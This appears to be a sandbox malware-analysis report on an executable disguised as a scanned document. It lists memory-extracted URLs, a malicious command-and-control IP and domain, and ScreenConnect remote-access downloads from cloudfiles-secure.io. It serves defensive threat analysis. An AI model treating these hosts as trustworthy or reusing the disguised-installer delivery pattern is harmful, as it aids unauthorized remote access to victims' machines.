                                                                                      https://login.microsoftonline.com/ppsecure/EnumerateDevices.srfsvchost.exe, 00000007.00000002.3270885495.0000022264A47000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056634730.0000022265363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056612582.0000022265340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056573432.000002226533B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		unknown
                                                                                        https://account.live.com/InlineSignup.aspx?iww=1&id=80502svchost.exe, 00000007.00000002.3270885495.0000022264A47000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056634730.0000022265363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056612582.0000022265340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056573432.000002226533B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		unknown
                                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namedfsvc.exe, 00000001.00000002.2784738148.0000022707C61000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000C.00000002.3274199153.0000000001410000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000F.00000002.2941168266.00000000032F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          http://Passport.NET/tb_svchost.exe, 00000007.00000002.3272552281.0000022265A32000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2088814426.0000022265A36000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3272697084.0000022265A69000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		unknown
                                                                                            https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationdb01WXG7dfsvc.exe, 00000001.00000002.2794699617.0000022724041000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		unknown
                                                                                              https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsBackstageShell.exe.configPjdfsvc.exe, 00000001.00000002.2784738148.00000227082E0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		unknown
                                                                                                https://account.live.com/msangcwamsvchost.exe, 00000007.00000002.3270885495.0000022264A47000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056321735.0000022265329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056612582.0000022265340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056592993.0000022265357000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3272112459.0000022265337000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056402892.0000022265352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056573432.000002226533B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		unknown
                                                                                                  http://www.w3.ordfsvc.exe, 00000001.00000002.2784738148.00000227081F6000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.000002270806A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.0000022708125000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		unknown
                                                                                                    https://cloudfiles-secure.io/Bin/ScreenConnect.Core.dll/uLdfsvc.exe, 00000001.00000002.2793656432.0000022721BC7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		unknown
                                                                                                      http://crl.ver)svchost.exe, 00000006.00000002.3274283658.000001E585061000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3271223902.0000022264AD2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		unknown
                                                                                                        http://passport.net/tbsvchost.exe, 00000007.00000002.3272942590.0000022265A97000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		unknown
                                                                                                          https://cloudfiles-secure.io/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClient.applicScreenConnect.WindowsClient.exe, 0000000A.00000002.2284680562.00000000032F1000.00000004.00000800.00020000.00000000.sdmp, CHT0VHXS.log.1.drfalse
                                                                                                            		unknown
                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issuesvchost.exe, 00000007.00000002.3272552281.0000022265A32000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2088814426.0000022265A36000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3272173508.000002226535F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            		unknown
                                                                                                            https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationdfsvc.exe, 00000001.00000002.2793865046.0000022721C0A000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2792984032.0000022721B00000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2794699617.0000022724041000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2284680562.00000000032FF000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2283633645.000000000156C000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2285819740.000000001BC56000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2284680562.00000000033A7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2284680562.00000000032F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		unknown
                                                                                                              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdessvchost.exe, 00000007.00000003.2190621904.0000022265378000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2168950175.0000022265375000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		unknown
                                                                                                                https://cloudfiles-secure.io/Bin/ScreenConnect.Client.application.ScreenConnect.WindowsClient.exe, 0000000A.00000002.2285819740.000000001BC56000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		unknown
                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/Issueesvchost.exe, 00000007.00000002.3272173508.000002226535F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		unknown
                                                                                                                    https://cloudfiles-secure.io/Bin/ScreenConnect.WindowsCliedfsvc.exe, 00000001.00000002.2784738148.000002270838D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		unknown
                                                                                                                      https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationpps_re=msildfsvc.exe, 00000001.00000002.2793865046.0000022721C0A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		unknown
                                                                                                                        https://login.microsoftonline.com/ppsecure/deviceremovecredential.srfsvchost.exe, 00000007.00000002.3270885495.0000022264A47000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		unknown
                                                                                                                          https://cloudfiles-secure.io/Bin/ScreenConnectdfsvc.exe, 00000001.00000002.2784738148.000002270845D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		unknown
                                                                                                                            https://cloudfiles-secure.io/Bin/ScreenConnect.Client.apdfsvc.exe, 00000001.00000002.2793324674.0000022721B6F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		unknown
                                                                                                                              https://login.microsoftonline.com/ppsecure/DeviceQuery.srfsvchost.exe, 00000007.00000003.2056634730.0000022265363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056612582.0000022265340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056573432.000002226533B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		unknown
                                                                                                                                http://schemas.xmlsoap.org/soap/envelope/svchost.exe, 00000007.00000003.2210637965.0000022264A7D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3272173508.000002226535F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                		unknown
                                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trustsvchost.exe, 00000007.00000002.3272112459.0000022265337000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3272173508.000002226535F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                		unknown
                                                                                                                                https://cloudfiles-secure.io/Bin/ScreenConnect.Client.manifest1dfsvc.exe, 00000001.00000002.2792984032.0000022721B00000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		unknown
                                                                                                                                  http://www.w3.oraScreenConnect.WindowsClient.exe, 0000000A.00000002.2283633645.000000000157A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		unknown
                                                                                                                                    https://login.microsoftonline.com/MSARST2.srfsvchost.exe, 00000007.00000003.2056634730.0000022265363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056612582.0000022265340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3270925562.0000022264A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056573432.000002226533B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		unknown
                                                                                                                                      https://login.microsoftonline.com/ppsecure/DeviceQuery.srfUsvchost.exe, 00000007.00000002.3270885495.0000022264A47000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        		unknown
                                                                                                                                        http://Passport.NET/STSsvchost.exe, 00000007.00000003.2156243757.0000022265375000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2165857970.0000022265379000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2156320828.0000022265374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3272112459.0000022265337000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2165831029.0000022265376000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3272173508.000002226535F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		unknown
                                                                                                                                          http://www.xrml.org/schema/2001/11/xrml2coreSdfsvc.exe, 00000001.00000002.2784738148.0000022707CF9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		unknown
                                                                                                                                            https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationPNTScreenConnect.WindowsClient.exe, 0000000A.00000002.2283633645.00000000014D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              		unknown
                                                                                                                                              http://www.w3.odfsvc.exe, 00000001.00000002.2784738148.0000022708125000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                		unknown
                                                                                                                                                https://cloudfiles-secure.io/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=ttyuio.zapto.oCHT0VHXS.log.1.drfalse
                                                                                                                                                  		unknown
                                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/Issuee2svchost.exe, 00000007.00000002.3272173508.000002226535F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		unknown
                                                                                                                                                    http://Passport.NET/tbsvchost.exe, 00000007.00000002.3272552281.0000022265A67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3272173508.000002226535F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      		unknown
                                                                                                                                                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdsvchost.exe, 00000007.00000003.2156243757.0000022265375000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2190621904.0000022265378000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3272256168.0000022265378000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2156320828.0000022265374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3271328739.0000022264ADF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2165831029.0000022265376000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2078695040.0000022265329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2168950175.0000022265375000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2209823243.0000022265379000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      		unknown
                                                                                                                                                      http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsdsvchost.exe, 00000007.00000002.3272173508.000002226535F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        		unknown
                                                                                                                                                        https://signup.live.com/signup.aspxsvchost.exe, 00000007.00000003.2056573432.000002226533B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		unknown
                                                                                                                                                          https://account.live.com/inlinesignup.aspx?iww=1&id=80601svchost.exe, 00000007.00000003.2056321735.0000022265329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056402892.0000022265352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056756954.0000022265356000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            		unknown
                                                                                                                                                            https://account.live.com/inlinesignup.aspx?iww=1&id=80600svchost.exe, 00000007.00000003.2056321735.0000022265329000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              		unknown
                                                                                                                                                              https://account.live.com/inlinesignup.aspx?iww=1&id=80603svchost.exe, 00000007.00000003.2056321735.0000022265329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056402892.0000022265352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056756954.0000022265356000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                		unknown
                                                                                                                                                                http://schemas.xmlsoap.org/ws/2004/09/policysvchost.exe, 00000007.00000002.3272173508.000002226535F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3271914143.0000022265300000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  		unknown
                                                                                                                                                                  https://cloudfiles-secure.io/Bin/ScreenConnect.ClientService.dllPjdfsvc.exe, 00000001.00000002.2784738148.0000022707EC3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    		unknown
                                                                                                                                                                    http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymoussvchost.exe, 00000007.00000002.3272112459.0000022265337000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                    		unknown
                                                                                                                                                                    https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationpps_ScreenConnect.WindowsClient.exe, 0000000A.00000002.2283633645.000000000156C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      		unknown
                                                                                                                                                                      http://www.xrml.org/schema/2001/11/xrml2coredfsvc.exe, 00000001.00000002.2784738148.0000022707CF9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        		unknown
                                                                                                                                                                        https://account.live.com/inlinesignup.aspx?iww=1&id=80605svchost.exe, 00000007.00000003.2056321735.0000022265329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3270802647.0000022264A27000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056402892.0000022265352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056756954.0000022265356000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          		unknown
                                                                                                                                                                          https://account.live.com/inlinesignup.aspx?iww=1&id=80604svchost.exe, 00000007.00000003.2056321735.0000022265329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056402892.0000022265352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056756954.0000022265356000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            		unknown
                                                                                                                                                                            https://cloudfiles-secure.io/Bin/ScreenConnect.Client.applicationxdfsvc.exe, 00000001.00000002.2784738148.00000227081F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              		unknown
                                                                                                                                                                              https://login.live.csvchost.exe, 00000007.00000002.3270802647.0000022264A27000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                		unknown
                                                                                                                                                                                https://login.microsoftonline.com/ppsecure/deviceaddmsacredential.srfsvchost.exe, 00000007.00000002.3270885495.0000022264A47000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		unknown
                                                                                                                                                                                  https://login.microsoftonline.com/ppsecure/devicechangecredential.srfTokensvchost.exe, 00000007.00000002.3270885495.0000022264A47000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		unknown
                                                                                                                                                                                    http://upx.sf.netAmcache.hve.5.drfalse
                                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                                    		unknown
                                                                                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/scstsvchost.exe, 00000007.00000002.3272112459.0000022265337000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		unknown
                                                                                                                                                                                      https://cloudfiles-secure.io/Bin/ScreenConnect.Client.manifesttdfsvc.exe, 00000001.00000002.2794432679.0000022721CE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		unknown
                                                                                                                                                                                        https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srfUsvchost.exe, 00000007.00000002.3270885495.0000022264A47000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		unknown
                                                                                                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/Issuesvchost.exe, 00000007.00000002.3272552281.0000022265A67000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                                                          		unknown
                                                                                                                                                                                          https://g.live.com/odclientsettings/Prod/C:edb.log.6.drfalse
                                                                                                                                                                                            		unknown
                                                                                                                                                                                            https://login.microsoftonline.com/ppsecure/DeviceAssociate.srfsvchost.exe, 00000007.00000002.3270885495.0000022264A47000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056634730.0000022265363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056612582.0000022265340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056573432.000002226533B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		unknown
                                                                                                                                                                                              https://account.live.com/Wizard/Password/Change?id=80601svchost.exe, 00000007.00000003.2056321735.000002226532C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056321735.0000022265329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056634730.0000022265363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056612582.0000022265340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056402892.0000022265352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3270925562.0000022264A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056756954.0000022265356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056573432.000002226533B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		unknown
                                                                                                                                                                                                https://account.live.com/inlinesignup.aspx?iww=1&id=80601svchost.exe, 00000007.00000003.2056634730.0000022265363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056612582.0000022265340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3270925562.0000022264A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056573432.000002226533B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/sc1esvchost.exe, 00000007.00000002.3272173508.000002226535F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                    https://account.live.com/inlinesignup.aspx?iww=1&id=80600svchost.exe, 00000007.00000003.2056634730.0000022265363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056612582.0000022265340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3270925562.0000022264A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2056573432.000002226533B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      https://cloudfiles-secure.iodfsvc.exe, 00000001.00000002.2784738148.00000227082E0000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.000002270845D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.0000022708353000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.000002270806A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2794636681.0000022723FB5000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.0000022707EC3000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2784738148.000002270838D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                        https://cloudfiles-secure.io/Bin/ScreenConnect.Windfsvc.exe, 00000001.00000002.2784738148.0000022708353000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          https://cloudfiles-secure.io/Bin/ScreenConnect.ClientServidfsvc.exe, 00000001.00000002.2784738148.00000227082E0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		unknown

                                                                                                                                                                                                            World Map of Contacted IPs

                                                                                                                                                                                                            • No. of IPs < 25%
                                                                                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                                                                                            • 75% < No. of IPs

                                                                                                                                                                                                            Public IPs

                                                                                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                            178.215.236.119
                                                                                                                                                                                                            		cloudfiles-secure.ioGermany
                                                                                                                                                                                                            		10753LVLT-10753UStrue

                                                                                                                                                                                                            Private

                                                                                                                                                                                                            IP
                                                                                                                                                                                                            127.0.0.1

                                                                                                                                                                                                            General Information

                                                                                                                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                            Analysis ID:1523878
                                                                                                                                                                                                            Start date and time:2024-10-02 06:22:00 +02:00
                                                                                                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                                                                                                            Overall analysis duration:0h 7m 41s
                                                                                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                                                                                            Report type:full
                                                                                                                                                                                                            Cookbook file name:default.jbs
                                                                                                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                            Number of analysed new started processes analysed:16
                                                                                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                                                                                            Technologies:
                                                                                                                                                                                                            • HCA enabled
                                                                                                                                                                                                            • EGA enabled
                                                                                                                                                                                                            • AMSI enabled
                                                                                                                                                                                                            Analysis Mode:default
                                                                                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                                                                                            Sample name:Scan_doc_09_16_24_1120.exe
                                                                                                                                                                                                            Detection:MAL
                                                                                                                                                                                                            Classification:mal66.evad.winEXE@21/78@2/2
                                                                                                                                                                                                            EGA Information:
                                                                                                                                                                                                            • Successful, ratio: 85.7%
                                                                                                                                                                                                            HCA Information:
                                                                                                                                                                                                            • Successful, ratio: 57%
                                                                                                                                                                                                            • Number of executed functions: 188
                                                                                                                                                                                                            • Number of non-executed functions: 26
                                                                                                                                                                                                            Cookbook Comments:
                                                                                                                                                                                                            • Found application associated with file extension: .exe

                                                                                                                                                                                                            Warnings

                                                                                                                                                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                                                                                                            • Excluded IPs from analysis (whitelisted): 40.126.32.140, 40.126.32.72, 40.126.32.74, 40.126.32.68, 20.190.160.17, 40.126.32.76, 40.126.32.138, 20.190.160.20, 2.19.126.137, 2.19.126.163, 192.229.221.95, 184.28.90.27, 20.42.65.92, 93.184.221.240
                                                                                                                                                                                                            • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wu.azureedge.net, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, ocsp.edge.digicert.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, prdv4a.aadg.msidentity.com, fs.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, www.tm.v4.a.prd.aadg.akadns.net, wu.ec.azureedge.net, cacerts.digicert.com, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, onedsblobprdeus17.eastus.cloudapp.azure.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
                                                                                                                                                                                                            • Execution Graph export aborted for target ScreenConnect.ClientService.exe, PID 7700 because it is empty
                                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                                                            Simulations

                                                                                                                                                                                                            Behavior and APIs

                                                                                                                                                                                                            TimeTypeDescription
                                                                                                                                                                                                            00:22:49API Interceptor12849x Sleep call for process: dfsvc.exe modified
                                                                                                                                                                                                            00:22:49API Interceptor1x Sleep call for process: Scan_doc_09_16_24_1120.exe modified
                                                                                                                                                                                                            00:22:50API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                                                                                                                                            00:23:08API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                                                                                                                            06:22:41Task SchedulerRun new task: {5837ECB1-20BB-4273-AE75-0A2B20C8D8BD} path: .

                                                                                                                                                                                                            Joe Sandbox View / Context

                                                                                                                                                                                                            IPs

                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                            178.215.236.119Scan_doc_09_16_24_1203.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                              VD01NDHM8u.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                vovE92JSzK.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                  s9POKY8U8k.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                    xkIXA8M8sC.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                      VD01NDHM8u.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                        vovE92JSzK.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                          s9POKY8U8k.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                            Ge1x3MBwf4.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                              tr5jscSEwo.exeGet hashmaliciousScreenConnect ToolBrowse

                                                                                                                                                                                                                                Domains

                                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                ttyuio.zapto.orgScan_doc_09_16_24_1203.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                • 178.215.236.119
                                                                                                                                                                                                                                VD01NDHM8u.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                • 178.215.236.119
                                                                                                                                                                                                                                vovE92JSzK.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                • 178.215.236.119
                                                                                                                                                                                                                                s9POKY8U8k.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                • 178.215.236.119
                                                                                                                                                                                                                                xkIXA8M8sC.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                                                • 178.215.236.119
